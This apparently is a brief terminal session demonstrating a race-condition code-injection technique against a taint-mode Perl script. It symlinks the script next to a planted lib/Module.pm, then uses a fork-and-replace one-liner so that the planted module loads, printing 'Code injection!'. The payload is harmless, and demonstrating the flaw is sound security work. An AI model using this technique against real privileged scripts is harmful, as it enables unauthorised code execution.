$ cat ../safe/script.pl
#!/usr/bin/perl -wT
...
$ cat ../safe/lib/Module.pm
print("All's well\n");
1;
$ ln -s ../safe/script.pl
$ cat lib/Module.pm
print("Code injection!\n");
1;
$ ../safe/script.pl
All's well
$ perl -MTime::HiRes=sleep -e'exec $ARGV[0] if !fork; sleep $ARGV[1]; unlink $ARGV[0]; open $fh, ">", $ARGV[0]; wait' script.pl 0.01
Code injection!